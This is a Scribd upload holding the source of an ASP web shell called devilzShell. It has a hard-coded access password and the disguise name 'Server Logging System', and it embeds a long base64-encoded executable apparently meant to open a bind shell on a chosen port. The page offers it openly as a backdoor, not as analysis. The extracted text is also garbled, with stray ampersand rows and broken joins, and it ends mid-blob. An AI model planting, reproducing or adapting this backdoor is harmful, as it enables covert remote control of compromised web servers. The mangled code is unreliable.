Scribd Logo
Upload

Welcome to Scribd!

  • ASP BACKDOOR TITLE

    Uploaded by

    Adhi Maulana Wibawa
    593 views31 pages

    Original Title

    devilzShell

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    593 views31 pages

    ASP BACKDOOR TITLE

    Uploaded by

    Adhi Maulana Wibawa

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 31

    <%@ Language = "VBscript" %><% On Error Resume Next %><% Server.ScriptTimeout=60 0 %><% session.

    lcid=2057 %> <% '# devilzShell <[asp]> '# ^^^^^^^^^^^^ '# author: b374k '# greets: devilzc0der(s) and all of you who love peace and freedom '# '# '# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ '# Jayalah Indonesiaku '################# VARIABLES GOES HERE #######################================== ===========================] shell_name = "devilzShell" shell_fake_name = "Server Logging System" shell_title = " :: " & shell_name & " ::" shell_version = "v1" shell_password = "devilzc0der" shell_fav_port = "12345" shell_color = "#374374" ' server software xSoftware = xtrim(Request.ServerVariables("SERVER_SOFTWARE")) ' uname -a xSystem = OSver() ' server ip xServerIP = Request.ServerVariables("LOCAL_ADDR") ' your ip ;-) xClientIP = Request.ServerVariables("REMOTE_ADDR") xHeader = xSoftware & "<br />" & xSystem & "<br />Server IP: <span class=""gaul" ">[ </span>" & xServerIP & "<span class=""gaul""> ]</span>&nbsp;&nbsp;&nbsp;Your IP: <span class=""gaul"">[ </span>" & xClientIP & "<span class=""gaul""> ]</spa n>" '################# RESOURCES GOES HERE #######################================== ===========================] icon = "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAB/klEQVR42o2RS2gUQRCGq7rH B0rw" &_ "4miwFWVmPSmIHpaQSwQD4ivGKHsImIOyBhJETUDjRaMIEjTk4gNFIutBwScY8eBh9aBgyCGCiKu4" & _ "E4kzBk0uimiI21XWwgbMorOppumuKuqr6r8RZmnjxl8iR0H2DzfKT03HsVLhV+Ove4rc8xk4uYtx" & _ "dCHgGQHc/SdAuqwZB9jCAE7RnwLGR8hHbiK5/aQzCcC0FP/+u2YG4KPx2+p14SKVTbFIiPdI7/ei" & _ "oL98whmAt8bv3O7Y89sIv29kzOpSvENR41lSD1Jh0BQLeGf8jq3a9nayetX2KVhfeta8Gm0nuwgH" & _ "0+FITSxgzPgtm3Qhs5qR+kgfqwIYGgVuTmk60EPq/p4w2B0LkG5+l7I5Ud3BUsoBBlc0uEVOakWU" & _ "vxMLKNqA8V4c0rZWyZ0lzbI2M9rTpNfKD+RiAV+MX9eiCs9+yV2ecLkacPgaUvcNxcuuWHW9Pgr2" & _ "xQJeGu9Us7YnjpMaFsE2FGOh8dN12l49SjjUGo4kYwE54x3eqW3fXlJjrawSMvLPN8brbtB08hyp" & _ "gaYwaIgFTJjE0l5l3wfAVRdIN4qQT8T/dht5btbq9pVR/lJFEUWHWhF9fnWUzxb9x8u9hwcV7ZjO" & _ "D1rHXRx9mPgvoNxkqjmTwKnXyMlVgAtcxucCyMwaUMn+AMvLzBHNivq3AAAAAElFTkSuQmCC" bg = "iVBORw0KGgoAAAANSUhEUgAAAAMAAAADCAYAAABWKLW/AAAAJklEQVR42mNkAAIpKan/b968YW AE" &_

    "MZ49ewamGdnY2P6LiIgwgAQA8xYNYheotNcAAAAASUVORK5CYII=" wBind="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAA" &_ "AAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v" & _ "ZGUuDQ0KJAAAAAAAAAA0GAk5cHlnanB5Z2pweWdqmGZsanF5Z2rzZWlqenlnanB5ZmpNeWdqEmZ0" & _ "and5Z2qYZm1qanlnalJpY2hweWdqAAAAAAAAAABQRQAATAEDAIkLlD8AAAAAAAAAAOAADwELAQYA" & _ "ADAAAAAQAAAAQAAAYHIAAABQAAAAgAAAAABAAAAQAAAAAgAABAAAAAAAAAAEAAAAAAAAAACQAAAA" & _ "EAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAACAAAAIAQAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFVQWDAAAAAA" & _ "AEAAAAAQAAAAAAAAAAQAAAAAAAAAAAAAAAAAAIAAAOBVUFgxAAAAAAAwAAAAUAAAACQAAAAEAAAA" & _ "AAAAAAAAAAAAAABAAADgVVBYMgAAAAAAEAAAAIAAAAACAAAAKAAAAAAAAAAAAAAAAAAAQAAAwAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" & _ "AAAAAAAAAAAAAAAAAAAAAAAAMy4wNABVUFghDQkCCbOeYU01Vb5H61QAAFUiAAAAYAAAJgMADCfk" & _ "//+DfCQEBXUIagD/FTBAQADCBACQuCx03/7/EgAA6AMABSxTVVZXaAAQI2gwUEAuHN1v396L0LkH" & _ "HgAzwI1GPPOruAQMv/aX3bsQBIlEJEADRI08M9tQUokf9naz/USJXCRQNgyheFYEvvdlJ/6v+/+D" & _ "+AGJdCQUfhyLDYQTUWkXg8QEZjvDbHf/7j4UdQQdjZQkrFNSagI+9Hb/ut+FwA+FQwI8PUcDfX5T" & _ "AGoB+777+x7olPA78zYYD4QeAptTSa3puq4ggBQHJAMoLCp7vm2b8GbHChwki0wkFFFA7U33Z+xU" & _ "JBBmvR4cUlBWdZDucpDczQFqChDkXjfsZryLLUTTThD+W/7t1taVIItuGI1MJBCNVFFG/vYgW5zg" & _ "dNPp5gIQaBAnABbOZhpHQP2IVNAbbt1HO9N0sJMQu4vxWSzBu///wukCXIvOg+ED86oPv0oKi1IM" & _ "i8EYMIvK956/Mhqli8ikxtEshG8IwckYzUYd6V67sBlO/wDm4Sxb5wYZ2DUYtFhA1d13lw12PAJo" & _ "BONSx4QkjNgBzn54cwtMnCSQ47QkmAacHtt8T6AAzzyNvDqDyf/G7nfcwmhQLvKu99FJiZ/GhACa" & _ "pum6GVwHRWVBY2marmlGeB9CbUfTme8GQwdkiJwMSA5E94s9Wy5mOIR6r1BR6bZN11oQ6wW2XFNS" & _ "1DSD6QpHdQ4A4dR3HP+QbgFFC8xfXl1bgcTj4Y5HNvkIg+wQ6DPtV8oKl7vH6AcUIBCJbM0U/mbr" & _ "Axw8TGg/AA8AVVVMRmr/LFQE+Dv9dHl/GldeePfZEwgdAAU7xXQF+tPrWfvdtNkUSD0kInVMVQBW" & _ "VZcOc7ddMv8BSWg4NzwQs22lf+iF7XQjlQFVTRQLbtvONQzWINa0Vltxc41LJRDCa6ldiS3t9mbJ" &

    _ "fHgBOT1sUgp+ESDvfnf6agiKBlBPKQjrEIsVYF4zyYoOj/Hf/YoESoPgCJgDRuvQgD4AdGa7iTSF" _ "1n57u4AGQKMMOkY8InUYBgWy7X//dAtGhMB0Qgp19UbGBgA1mmUeO8lmyQ5RD6Fk0ooW+q0dWVB1" _ "zh8/yXQC68tXOGloBxCUGAcANjrM3FIA+MfOzIDyH2v6ZYurg8cBfg8PtgdqCNle6X1ZWesOLGTF" _ "QQr/9rKFwEfr0hU3R4P+LYvubGGt19oGKzUPdkMsZw/7DGoEVkALoTxwBP32798NjQSbjVxG0DDr" _ "z4P9QsN1AvfYyb7b+pLD/0MENgSMWcPMAB0fo8BRPQJxCHIUgUIVv/2x3z4tEIUBF3PsK8iLxAyL" _ "4YsIi+H/jYVAAsMh7FGLRQiNSAGB+QCfsHR7tncMvQ+3vutSt1b//+2v1w7B+QiB0fZEVgGAXnQO" _ "gGX+AIhN/I3LduOIRf0g6wkN/UX82rXtj/ZYjU0KBRNRUI0QUAvfbrjQnQdmxBxOAsnDU0UKI0Wy" _ "Y4HfDMl0av+qQVKUIuHGe/dkoQAAUGSJJQfgWFNi8SNceIll6Il0QKvUiRX4VNt3n95hyIHh/8gN" _ "9A3B4QgDygrw3A+7P+gQo+wHM/ZFEVpZbrs3ug0wHAsG1ol1/AgPr+y79kkWoxhaBA8OfaPQVAls" _ "22Z3DDAEC3cImSvQt6T3/zMNCEQWH4lFnPZF0AF0Brs0vS1w1OsDWlgddZxWoXALv2XXUCMDDKAI" _ "CMZH7GVD6Q1VCYlNmOzOCZs2F77dw4vHdZge1+3YVHUFWO0g7A0TaLwToQmVbAhz5XhSLyRZJXhL" _ "OBEC7ADu7jYbxAiLC8gFDHUJDwT34dv43TqrUwWL2B33ZK0DCZzgLjCE01safxh8eHKEGKHcU9s7" _ "NdgsbHA+zeReVhF7f6TOM/yAInQEi8brHRsY+WSDZwxTiHyEzgAtvMG7AlijQ2wCdSQcHGVbMN1J" _ "BaFEvBEUAhDYMSuVDDkzqQiHt18LmGzglCRdGBmhVGObbU/0RY1TLEEg+InW0HQbwFRAhBg3wb/x" _ "b18f4FZ0Y4ld/I08IceDwAMkdmEXi/wNwIv00NxXzDhKy46FFPwMW6PBxkY7kdQqg7//ydrs1ukp" _ "SeBWXxxVPHOtc1IRFNeg7esCnYULXUNlbU3wJg2JCG8sgVvIoRRaCNgH80Bh0BohCPquIV+DgZQO" _ "AD5ndg2nwxjQDI4I6BC5tU3IAVcPX7koVbM9Ond1ERh6LGUGhHBxoSEIDNSLXAmd/d0VpCKIHSAo" _ "PKEQgyI/+98tuAwJVo1x/DvwchOLBpeD7gQ7hnyFvzUic+1e8pQUw5d8N25oIBAchdtbC61nxDp6" _ "iYZwX8MFtSfbdRI7qnMNV8YE61HCtms4yp4IPgrcGFn4N1v7xSBwWAhIChWD+wXlDd0LWYNgCOpY" _ "4wrZg/uNktvMhPauLGEsvbbrY6VNQguLSASDZ4XIHf/NrTT4EAUV/APRVjvKfRWNNPC33e1JK9EE" _ "tYgSgyYCxgxKdfeL3bYOdngEU7eOM8BpxwWfAXv3DINA63A9kBKBXT0B+RmQkYRKPZP5GZCfhTc9" _ "jYIkPY9Onp8BhhE9kgqKay2MnZ2IarXTdAprwH0fWV7rCPpREWOj41lwFPiDyP8xbFko1yi5uFtd" _ "w+RGUS7ufbtGOWjZVrgFdO3r7Rv8n4DADDvGcwQ5EN2NDEleA+xyfL+NFTvBEnSWMwhaeBk4sgAZ" _ "WrHkRDPxkQ4likYBJ002Gy7QIBHAwFCnFVR05vi2lSVa4yENBwo8IHa6rr2VTQwgd/o0KAQP6fUu" _ "LZTZ21MnOR1a29cWrA5bWtAT/yc6An/6SyESPD10AUddGxxZjSL8Tm3wAevorL1hZhqcA25HW3tZ" _ "5zUI9Y7sfwtPCcYHPUE4H3Q5VVc5it2+RUhZRYA/SSJVNLZYtlB5PAYuOzaxb3f8eKxZblkD/Td1" _ "yV3/hEPpt30WdisdC4kejYc2Bl84qWFb1FG9rxi5V74wii2pP7bDqZATKaIYfP44g61ChRhNJ874" _ "vNoGrxV1n6yLDy0N2zag/NiI1KgYtWGTrtahCC8n2zWs1SSGMTVwFEhazuVuZgCco/ylL5hSu7Vt" _ "TBgcFJSDIXJqjlhji0p9VLUgrdVLpYV4dzeDx1MU8gv/woA4m0SKUAFAgPq+KYTSdCUX3rj90vaC" _ "4VdHBHQ9AYX2cIoQHTsy9ogWRkAL1evODASAyNjtLR1GQBzrQx4Ff0vetgRARNr2gxkYiB5e3pq7"

    & & & & & & & & & & & & & & & & & & & & & & & & & & & & & &

    _ "RmUgdAkJCAl1zHUDSLY3jjW7Smb/gGUYAE4A+75mlrbgRCsFJwNeeGBmbPEXyLyLVbbCaxffAsfQ" _ "14UiXNH49y3wQEPr95Is9sMBltzaX7hBOX1tDYB4ASKN4x2Lwihh2EpbNwgM7u/2t98YGA+UwokF" _ "0euL00uFkw5DiNpboULXBbFLdfOA30Zr5KcgP1UKij+su9Q2dDoPZ3QuKBniwgkTBgYfGw9AsGtz" _ "AwMVAUCQDbWr3deGMA8Og8cDg/eUmgFDo+H7oOOFDm5JoTSIU7stpEBNNgftwT3AzATV+j3XAS0W" _ "Ie3rKGYWTpZvVPsX6hszsgNzAuIPWoHdbLMOQww/J8JmOR5t0Forc+s7CPv5NnZLnwbyK8YvUE7R" _ "+I5A0h2w0QJdUys0/9c1KVdL+jvrdDIyC41qroFbHFVQuyQlIW2D1L1WDBAnXAmL9sTP1gNWnpjD" _ "61OVTKUSpZO5hbF0PGBD0vZv+3QKQDh7+wT2K8dAalXOUolWWKr7Rrp05WCk9ZyzDpRfPDrxxiCV" _ "w+ww7HCCRIsROmHTpKllMhsVWUAY4DXAsgBaIB6GKfutbNy0cxptBLbGRgUKoSNC7u/S9QgFG+vi" _ "jeGYTh1NDGYJQnXFNen3RQnCbrkLMI3cu/1XYrhKSo0cLnwCdjk1Yz6wzP19Ur8ETI8AOIPS/NjP" _ "f4kHjYh+wXMYgGAIGHuBy0CLD3YIgcF85BVif+bVSXy76waLCfvxL2y80X5Giyr4ZDaKTQD2wQEw" _ "oe6tfgQIdQulsB6lCo2/0MeLz8H4BY1Vy3Qv1HrPIaULiQgviDVe4hvrR0WDw5v+fLpQKPECn+w8" _ "2P/y2HVNOxa3b10ABIG0avZY64jDSPW7HaE7wPVYrKiD/3MXV2b9MFInDCUVPtAGgE4r89YoauoK" _ "A3UK8MW+xG4EBYBDdAN8m/+4Ajwrszao0kTDhXrVUYN3GWgceGRrUHYgVbSj6FjcOjY8hS4e0UoP" _ "POhY6JAD86BySL9YONF7/OdV2Gi02PRYuCEeCC5SXTqL5afujjrbTItBBAaeuB3rvozRdA+tVIkC" _ "uAMQwz7Njv6hi9lq/mi8IYn/NQDFLrogGSBKi3C+sOO2QP7xLjvadCghdosMs4XbVgmpbUgXfLOx" _ "/fbv+3USaAEBLbN9Em7/VAjrw2SPBQjtnONDooznZIu2t+DS94F5BGh1DVEMpTlRmLh7C7EFm4pR" _ "uxSF2woEK3EIqGFLArdGfGtD0GsMWVt371ZD6G/D/TIwWEMwMPfjCPr8i11Yii3ll1hA5NmC5qB1" _ "cIkxReEPCInvsrU+IXN7CMFhulv7l212sY90RVZVjWsQqAtdI7oXul5BC8QzeDwlU14DxrpyEZgd" _ "VgzatWOyFVw2b96PSnznum2PVQw7CDAaizSP66HqHftq9nwcyesVXEOITVbgP10WlLVCb2i8O4sp" _ "i0H2A151yRoQJOGhe60aCrihmfIqinWs3M98UiFo/D6GoThWj2DUy1nwdZzwH/5g14HspIRVCDPJ" _ "uCjY3bTVPjuQC0JBPbgMfPG5hfe3lfHB5gM7lhomHCpJZ5aGbLzocA3X9h66ENeo+nUL8SBsRGLh" _ "hVw+/7kpAOXBukm6MBMX/ENALXF2FiZZEleSvWdvx+IHYUBZZTx2KRlQL3B2FnT4DYNGagMDN7Op" _ "7vho+EFXqCesVWD/xs6SNNwQVwy8zP2QwR3YvP+2LNMWzFSr2REKBCfBL98ZsFkaLF/rJo2Emhor" _ "azBq1zY7TdOk3Qhq9Nx/xF5OTUOAyeQtDEdLpo0mCEfFij8x+apEKf6D+gRyLffZVHRvvv9fE4gH" _ "R0l1+ovIweAIA8EGEMqD4gPXXaIUewPzqzoGIw4o5UxKPs0ixDnJVo0EFWVP3ICuHhaKQ4SIJHVb" _ "0ISBHGZTDglFhgOuq2ohIzvkeCQzUqQB/wUY9poBfvAXLyE1uLQQfXCiFbgi/N5WLJd3/AnSuMgV" _ "OTB0cjBCVFGaYuEN6Nuc99YVIxgkvkBjWb/ggtAWewnT6AGJUMOqcXOjtenkgA+G74B97rG1+NMZ" _ "u03vihEPDK6x9038LLZB/+Q7wg+HkyXHW21ZAw7uUkg/Uux+owEsiwSqjZ7YkYA7v03ob7TLdCyK" _ "UQFkhbb6O8d3t2/3jRTJ/IqSwCAIkEZAE3b1bBu68EFBgDkY1P/cwwid/EGWMC2Ewfz9zG0WHt5Q" _ "o6wLeeTMv8B07P7eD6WlWaO7petVQHn//0g9fWZwGkKhCEA9SnKwbBYrIzksVDbWXmtx+gvCTasA"

    & & & & & & & & & & & & & & & & & & & & & & & & & & & & & &

    _ "voLb6OsN2FwKmzCs4KpQ+wTVHUFbangfHpXfgyUhVf4jPMjW6ktc/yV4av0oMHJhFGz85RaxZSdy" _ "GUn1UKmUgameKii0wbY2FwQNbkggdjZTOwG4BOkFEgsgLzzPCBFXbFkzwN4bIdiqtBejxdwbBs76" _ "w18zFKQE7AaMCI1W9+cKFgumfz80wL6HiIQF7KyCxqW6+v5y9IpF8saFDSCpN6Mv4erGjVVgtgra" _ "v3cdKxi0e+zIjbwqQbggAIvZlzb99s/LQkKKQv80ddBfW2qd7PpYa/YagzWNejFWnbFgxFa1I/2y" _ "m032HVYeVjQjKKqwQ1cy/GjvJ39bsBReXD2NcmaLEb+fsMD2wmAW+hCKlAVkiJBO3gqY4L8aAnQQ" _ "IMZbAHdbpqAcgWHCDY08AL/rSRUlf1hju0FyGQRaqkvIgMEgiJOXt7GISR8dYXITencOrm7YmyDp" _ "IOvgTEq+ZeHXgwE6Emr9CJZZ/F+dYHIIWvQDJNCogR+XHw/2VhoWLVg+Zx86Xr0TQMN6HbyxsNdI" _ "fMscJ2qNpCTC/7us4ZH4V/fBA/6KAUG2Ow4S/f//dfGLAbr//v5+A9CD8P8zwoPBBKm/ht9t8IF0" _ "6Jf8JiOE5HQaqUh0gR4d6Kmno82Ny8tboz/+BP7rCP3rA/zaGswR9l8ZC0EM/WBvxWSIF0di7usF" _ "iRe+rBCsxWduaYNrN/a2m+EvNITkJ/fCaRIH2Qm0sWrHOC5mCLYlK9HG7gwIiAcjw9kIuHAqWsUb" _ "9eiu/rHgdyIObTo6u23adRZkmJ6DFdoTKvneRbsbOEJYNcANdwtWGiJlqBRNPRwuA3ByCS/U/8rm" _ "8FZqZEE4xAYAX16I0JCTFEAA5KS5SGMyJBNJtke4QbUrwcMJ/qbZZJL9/IbGoNBStFfFnU1SttEL" _ "FMEQ0QPG1HbUMI3t+PgPgnhH98eMFIrQ/0I4kd9yKfOl/ySV6CwWKvDbYse6HIPpSMrgczO3JYjI" _ "F4UABo34Tdc9XZAHfBAEPANgI7a3wMHRiszXiEcBBQIZW7bmVghZxsdczJaxZSeNSSslAQI7m+RZ" _ "AqaQI0YhrjuQr0c/jN8GzAOapmmaxLy0rKScNN1C/79EjuSJl+QH6OjTNE3T7Ozw8PQC0zRN9Pj4" _ "/BBafNgojZoD8HoJwDTb7//wAC0DDCAN7C3tWF5foJCdCwnBBZv5EaMN4e3DDAorjXQxZ3w5/H92" _ "20sGJA394/x3gC7CeWtxRe+NMC6PF/mcTPkriC0swma67pCYC7gD4G0DOlvydbdvA05YT1a2S90u" _ "Ydgfo+4C7wK8ZQPyKYyQJySNV7Ykqy0DrkXXXZiBWmBbNAY8A03TNE1ETFRcZHdpmmaELpccHBgY" _ "pmmaphQUEBAMkKZpmgwICAQETdedsB+QBZgDqLwlOLeELpe3tYcDWwizD4MTIZlOCLdoQBnVDLkW" _ "YHK0SFuts50luqwGsAUGwIzEo6iUoLrspd5CeKEY+YChtAfatDVgiLraVJJQDNcL7ZY1ACRyB2MU" _ "6+hfZXIRIaPLnsX2VnKv8/ryK3EMWriD/7/AwvxXwe4Pi86LevxpyQSvS4l92Cjk3jCMAUSZILZN" _ "xrcG3L0ME9UI+HV/wRGjQnz7aj9JXwsMO892qZELBXq7EwQ7Awh1SL2lIP+tf+hzHL9x0++NTAGO" _ "1yF8sET+CXUu2Na7K3UhOeskdeAeLX0692AhvLDEEiQGeQSZsXLBUYd8EwoEje+2G8xd+A0IjIv7" _ "wf8EZHRb29r/P3uGXy+94ZfsFWoAWiTQK6gFun/MEaGJVfhJWjvKpnb2/LmtdfPKQRv7QD47+nbb" _ "UrstmPq/dGsuiVG+UTwyMmC9uurSIVRhwSKXER69LdYS8tIhlExSv1pZzrZJvkoLBAgRFS5s1JEn" _ "7NUJOTOGfDMbpIkp8I0M+crWXPcLJokvDgUIol1q2ZdKY4cHBO/bRrtfzU0P/sGIC3Ml8w9GDnay" _ "3b+7iIvP0+t2CRkNjUSxxW4V+wkY6ykkwE/gGWOH4J4lWQQPnYS3CVT6VsM4i1RFoxqJXBNXhngs" _ "S3L6oXZMWqp8ot9/pFanQBTi9qZqDwNIDFKAAEPMXiN2klNRgB8y/rD3IBwJUAgOOUAQg6SI4uxu" _ "9mwkD/5IQwpI6rE33OJ5QxODYAT+EYN4CLrXNt1DbFMQcAxaEgkQLXosLGD0D9hC4RjyBICSy8go" _ "+sW/ofNMEexRjUgUUZsrHOP9dmVizv8NLzsFIjVPv7ZRtxSWOokNTOsidX5Pt6OsiTU1XClgkypm"

    & & & & & & & & & & & & & & & & & & & & & & & & & & & & & &

    _ "L2gbn9yNYDyCLBtIF3bw/Ds6TBdqSTR9DoPO/9PugynHWy3t/+/06xAmgP+2wL0z9tPoDgOhaYvY" _ "O99/u/AbfwhzGYtL4TsjKyP+C891C7td41Y+FDuaGHLnB3V520zI94vaO9gmFQXr5hklukV3dVkk" _ "c7N7CEh3yLNzEzfr7SYNG7dfmbMv7hclbnuF23YXtDAWCCYfWVstbFut/IBDqDhsB91r1W0b6SNp" _ "WqUUi8NbqW0W+sdKLYuMkLY7e9ilgJBEiDeLEnAR9gtvZVXdg2X8hEhEC9aLCwEMtdB1B5FJFKb/" _ "LlwcX4v+IzkL13Tpi5cbhzXryjP/XFhNdkz/7mB3V851DWZqIGRfhcl8BdHhR66u2+7r94sgVPlD" _ "Cit/8XuNRk3/wf4EToP+P374Xjeb0qaTzA0BJGEgfSsRt6UOAu84nNPz7CM3ynH3XIhEiQP+D3Xq" _ "Yewh0WID6QvrMRcrlSu4douhMiEZKTaYLCbnKASFIgrArk2vy3oE+ACVr3oIkNt+rmqEoql88UIM" _ "pVkGkFoiwmQG1VLpZv4LfSnEmQsujW2uxxFiv7DOjAk7gN12yQqPCXyu6y8ovg9po+VOtgl7BLG8" _ "cD3Sxa0Wvu4JN2p0uaVfOnQLiQqJA/yyeXVt+G0bvNEiARIy/J+LDnr8VqohJQ8+dRo7HfLQiNSV" _ "60s7pAbSpbpgaxGJUEIECAY9OCkCDW/sMN26wf9ddTBfiVBy4JCWBaW0V5doMIPCBirHdIicDX/B" _ "YsA9CmjEQeAIR7bPTEUwjTSBM2SJRvZBA/0QdCpqBGj/aLJXGfQGMMhgDB12EFe11ICB/N18TqAW" _ "+60kxYl+BP8FYkFwHapdqovGsu7po/WNrktxyEEIM9vFT+vjRrPgQ8M3acCBWvvEdhtjMIJF6kAI" _ "AgTdujVsnEoe+4XB5995DBcw5LOLEIAARQ36TSbRJycVjZcAcCNocGn7+nc8jUd3SPKDiH5mMO/u" _ "9I2I/AbHQPzwQg56n/vt7/+lSATHgOgQFAVW3lE3WCzwlnbHI08MBfjeugLghukmiayNSgyH28vW" _ "CI9BZJ5EQrye41Wq8RYsQ4rIC6BGq1vdeohOQwsJeMIsCjgoMMtofmrPj4rQ2KvkYFZCeJDo4WhE" _ "RDBczWeLNbl42FBBhjhEs9ZhB37P/il0UGgoEGgUB6Nkbnop3uHWo2i8C94W/9BdvWf/PXQOoWgQ" _ "BVMRvhigV6phA0FNjgdWR1zr+I8MV5SsUrv6elZTi9ndFPebTgVvqHEkEG7bdW/rIdbVjii8s3Ql" _ "gSkfN/tfe3XrLR1Rg+MDdA0gHaEOKlQv8CBbNVB6z2jDyXQSOoN30j0DcRE67mwYgAjQNi76Kpgg" _ "I8B292Ov+gYny3LyFoPG3iweDLXCtyN1xjnrGIHixwwt9kjTCQ4ABDPSU+5s97ttVQoEiQdfdfiw" _ "dYWjAjlCMFlQRLWCUuQcVJ8QXAI+f0ZX8ltTZIme4FbUVtaMs5XfRhMdI+siIAxRTwg+G4heIgEI" _ "3mLSWWxcFH4QoHEHRFRdzllZ5WDrotfJHRMdFhy8JQQu2XRIyOb5EHMqOtN9IAQbs3Ygcy5/JKCD" _ "5yVzIP+Lc+RNnIjW14VWGQRgmxCCG3fEQdw2CMGGX+sTcP8mBby1sRGLOGfcdGa6ZG22M9xhIVf0" _ "TS/iLObsGqWMD+1/iRJPRfd0MvZFDQR0QD6zm6m2HHiyQNV/HtrAbG1kMkjSj1C6kIayyMeD8gvZ" _ "XN2zNtyJXeAuVkoyEluyfXfKutbfdM9k5Gd0nI+4zW43s3UEA+sGjChoIPggNmaU1VC/t3ELFKGL" _ "z8Zx0QgAlkrNi0RW/EoNEmywUELsQO1J9NjcEt3zDF7IKx6DwuSCkxaKdH4PODL1OqqBtwSe2eRA" _ "SXBrf2g8y5HPCYA7eDz8O5ACJNh1BLwD4Dt/CDkA8mg8aDw0XTdYP18GTANEPAk2TdM0LCQcPH/u" _ "M4cAaDzwgAMDkASbjKA8fwDnEfKQPrA9CD1IsOt+LJAYCzgDYD1/yCGQVwA+AD66brBQW7R/vAPE" _ "bJqmaczU3OT3PU4IARJ/HxAgwabrBRgDKDw+fxFm+gXM/yXAmgA1anMA/6sWSitBj8wDF00YkwPb" _ "pv6/cnVudGltZSBlcnJvclENCgNUAflv9kxPU1MRDgBTSU5H/rL2AlNPTUESEVI2MDI4t7+83Qgt" _ "IEthYmx0byBpbmlWYWw/3+zbaXoNaGVhcDcnN25vdLZvcGs9BHVn7nNwYWMjZuw2YO97bG93aThh"

    & & & & & & & & & & & & & & & & & & & & & & & & & & & & & &

    _ "Bm9uNyB5Crk2c3RkWvvtZzVwdXIrdmlydHUhM77Y9tulYyMgYwxsKF802nabQl8qZXhcL1iwk732" _ "BtziXzE599vu5r5vcGVYMXNvD2Rlc2NrbTJgKzhGJIHfQIhwZWQZVyM3dms0JG2brHRovyGM5Nth" _ "L2xvY2sXmtsGWzRkt2EuAvat4daiIXJtAHBAZ3JhbSB7IRS2Sm02LzA5T6MZWgoQQSorFPK5RjAu" _ "Kzg9D+H7YXJndShzXzAyZott267Bbm5ngm8FdDoR0ApnrWTmf00tYBj/8LY5ZhVWaXOqQysrIFKg" _ "Ye67PUxpYrRyeScKLRYaZ9vDRQ4hEVDUOsI2rEDZAC7v5eD89ra5JSxrbHduPhtHZXRMYbELd2wy" _ "QQJ2ZVCudXAT/61tZw9XlWQmh2Vzc2FnZUJvNb6wxHhBfXMlMzIuZCrPtaInN745SAMLVJhrxHI6" _ "IAMAq6QeQF4pp7Zq9ftSU01TUwdlbZk0U1ffAKX5v3MgTWFuDucoQnZyAFwv2gOZZMq2ACABKCCZ" _ "SB4ASAAQhEAmZAAQgQZkCGQBEIJkCGRAAhDuqsrcvwABB9sIdZAu2xhbBR/AZJBukAsdCwSWQAZp" _ "Bo0IjmRABmSPkJEFZEAGkpOyLEQHCAfvCowkLwtvDKsABZMZ9zWgb6uIbD9cB03TNE0JMAoMEOB0" _ "r2mWQhGwElcHExczTdNgGChYB033lk0ayEEbuwccaDRN0zR4WHlIetM0TdM4/DT/JKuInQRTAgTS" _ "ReTZwb5ggnmCIRem3wehpbx5/v2Bn+D8L0B+gPyowaPao0HOHmGXgf4HQG6QIbC1L0G2X+cr5P/P" _ "ouSiGgDlouiiW36h/lfy291RBQPaXtpfX9pq2jLT4GXn9tje4Pk5MX4A+AMyKCKwWdnVUVF8RyQw" _ "/f8GoE1EQnl0ZVRvV2lkZUNoYXID8H+7FFVuBm5kbGVkRXhjZXAF+la5bUZpJmUZD0N1cnK2oFWt" _ "v1UAcwJw2dYSI2kMQ1iTbIO1KA5BL1NEe+wLwGlytm9yeUFFU3lzJ7PWDmxtFFNvaxtq9hvAdGGP" _ "cEluZm8s7rNXuZbNgG9tbZ7J2jD3TGluZR61v8q2JABjJUWTT3L7F1sAWXMWmkFkZHKtCUABGExh" _ "PABHArpJVgVBbGANYGtMDUiBCj32NztSZQxDQUNQB01vZCycRbhyZUgqqFYjc2fBHjMtC09FTSd/" _ "VIBlwt55cCUPV1RruyU8ajSVQ01vIxCwCTtBDVd1ZUMB2JBlTr84RnJmKWxl7RhFbu3s0Jpe20R2" _ "Gm95ZhGGEDZXxeUbrAEUelvDZBIxey82DY3PTzZ7SZgEUIYYCc1QbnxSdGxgd2m8YfA0G7F0ypGJ" _ 